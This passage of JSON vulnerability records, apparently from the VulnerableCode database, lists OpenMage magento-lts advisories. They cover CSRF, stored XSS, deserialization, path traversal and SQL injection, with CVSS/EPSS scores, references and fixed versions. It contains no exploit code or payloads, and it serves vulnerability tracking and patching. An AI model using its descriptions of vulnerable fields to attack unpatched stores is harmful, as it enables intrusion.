"http://public2.vulnerablecode.io/vulnerabilities/VCID-7srh-wcuk-ryhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/52901?format=api", "vulnerability_id": "VCID-87ka-etbj-pfen", "summary": "Cross-Site Request Forgery (CSRF)\nOpenMage LTS before versions 19.4.6 and 20.0.2 allows attackers to circumvent the `formkey protection` in the Admin Interface and increases the attack surface for Cross Site Request Forgery attacks. This issue is related to Adobe's CVE-2020-9690. It is patched in versions 19.4.6 and 20.0.2.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15151", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25249", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25141", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25198", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25265", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25169", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15151" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/7c526bc6a6a51b57a1bab4c60f104dc36cde347a", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/7c526bc6a6a51b57a1bab4c60f104dc36cde347a" }, { "reference_url": "https://helpx.adobe.com/security/products/magento/apsb20-47.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://helpx.adobe.com/security/products/magento/apsb20-47.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15151", "reference_id": "CVE-2020-15151", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15151" }, { "reference_url": "https://github.com/advisories/GHSA-crf2-xm6x-46p6", "reference_id": "GHSA-crf2-xm6x-46p6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-crf2-xm6x-46p6" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-crf2-xm6x-46p6", "reference_id": "GHSA-crf2-xm6x-46p6", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-crf2-xm6x-46p6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/77883?format=api", "purl": 
"pkg:composer/openmage/magento-lts@20.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-nv23-eun4-1fdd" }, { "vulnerability": "VCID-pvcg-c61e-x3an" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" }, { "vulnerability": "VCID-zwm8-96yp-nben" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.2" } ], "aliases": [ "CVE-2020-15151", "GHSA-crf2-xm6x-46p6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-87ka-etbj-pfen" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56736?format=api", "vulnerability_id": "VCID-9axm-6vqd-tkag", "summary": "Magento LTS vulnerable to stored XSS in theme config fields\nAs reported by [Aakash Adhikari](https://hackerone.com/dark_haxor), Github: @justlife4x4, the Design > Themes > Skin (Images / CSS) config 
field allows a Stored XSS when it contains an end script tag.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-27400", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41763", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41797", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41827", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41817", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-27400" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/d307e5bf75729a2347dde0952fe9fd9fcd9c6aea", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/d307e5bf75729a2347dde0952fe9fd9fcd9c6aea" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.12.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", 
"scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.12.3" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.13.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.13.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27400", "reference_id": "CVE-2025-27400", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27400" }, { "reference_url": "https://github.com/advisories/GHSA-5pxh-89cx-4668", "reference_id": "GHSA-5pxh-89cx-4668", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-5pxh-89cx-4668" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5pxh-89cx-4668", "reference_id": "GHSA-5pxh-89cx-4668", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": 
"https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5pxh-89cx-4668" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/84212?format=api", "purl": "pkg:composer/openmage/magento-lts@20.12.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.12.3" } ], "aliases": [ "CVE-2025-27400", "GHSA-5pxh-89cx-4668" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9axm-6vqd-tkag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54392?format=api", "vulnerability_id": "VCID-9tvj-q7kh-7faz", "summary": "Deserialization of Untrusted Data\nMagento-lts is a long-term support alternative to Magento Community Edition (CE). In magento-lts versions 19.4.12 and prior and 20.0.8 and prior, there is a vulnerability caused by the unsecured deserialization of an object. A patch in versions 19.4.13 and 20.0.9 was back ported from Zend Framework 3. 
The vulnerability was assigned CVE-2021-3007 in Zend Framework.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21426", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61369", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61344", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61392", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.614", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61387", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21426" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21426", "reference_id": "CVE-2021-21426", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21426" }, { "reference_url": "https://github.com/advisories/GHSA-m496-x567-f98c", "reference_id": "GHSA-m496-x567-f98c", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m496-x567-f98c" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-m496-x567-f98c", "reference_id": "GHSA-m496-x567-f98c", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": 
"generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-m496-x567-f98c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/80407?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/302495?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.10" } ], "aliases": [ "CVE-2021-21426", "GHSA-m496-x567-f98c" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9tvj-q7kh-7faz" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/55589?format=api", "vulnerability_id": "VCID-9ztp-ffqs-4yh4", "summary": "Magento LTS vulnerable to stored Cross-site Scripting (XSS) in admin system configs\nThis XSS vulnerability is about the system configs\n* design/header/welcome\n* design/header/logo_src\n* design/header/logo_src_small\n* design/header/logo_alt\n\nThey are intended to enable admins to set a text in the two cases, and to define an image url for the other two cases.\nBut because of previously missing escaping allowed to input arbitrary html and as a consequence also arbitrary JavaScript.\n\nWhile this is in most usage scenarios not a relevant issue, some people work with more restrictive roles in the backend. Here the ability to inject JavaScript with these settings would be an unintended and unwanted privilege.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-41676", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.71703", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.71717", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.7174", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.71734", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-41676" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" 
} ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/484cf8afc550e98bbf2c03fbb29a8450a32e7948", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T15:41:02Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/484cf8afc550e98bbf2c03fbb29a8450a32e7948" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41676", "reference_id": "CVE-2024-41676", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41676" }, { "reference_url": "https://github.com/advisories/GHSA-5vrp-638w-p8m2", "reference_id": "GHSA-5vrp-638w-p8m2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vrp-638w-p8m2" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vrp-638w-p8m2", "reference_id": "GHSA-5vrp-638w-p8m2", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { 
"value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T15:41:02Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vrp-638w-p8m2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/82278?format=api", "purl": "pkg:composer/openmage/magento-lts@20.10.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.10.1" } ], "aliases": [ "CVE-2024-41676", "GHSA-5vrp-638w-p8m2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ztp-ffqs-4yh4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53974?format=api", "vulnerability_id": "VCID-b33e-r7rr-pyf7", "summary": "Path Traversal\nOpenMage is a community-driven alternative to Magento CE. In OpenMage there is a vulnerability which enables remote code execution. 
In affected versions an administrator with permission to update product data is able to store an executable file on the server and load it via layout xml.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26252", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82422", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.8245", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82449", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82447", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82441", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26252" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26252", "reference_id": "CVE-2020-26252", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26252" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79587?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, 
{ "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.6" } ], "aliases": [ "CVE-2020-26252", "GHSA-99m6-r53j-4hh2" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b33e-r7rr-pyf7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54389?format=api", "vulnerability_id": "VCID-b7ua-zfks-fyg5", "summary": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\nMagento-lts is a long-term support alternative to Magento Community Edition (CE). A vulnerability in magento-lts versions before 19.4.13 and 20.0.9 potentially allows an administrator unauthorized access to restricted resources. This is a backport of CVE-2021-21024. 
The vulnerability is patched in versions 19.4.13 and 20.0.9.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21427", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70821", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70803", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70845", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70852", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70835", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21427" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21427", "reference_id": "CVE-2021-21427", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21427" }, { "reference_url": "https://github.com/advisories/GHSA-fvrf-9428-527m", "reference_id": "GHSA-fvrf-9428-527m", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fvrf-9428-527m" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fvrf-9428-527m", "reference_id": "GHSA-fvrf-9428-527m", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": 
"generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fvrf-9428-527m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/80407?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/302495?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.10" } ], "aliases": [ "CVE-2021-21427", "GHSA-fvrf-9428-527m" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": 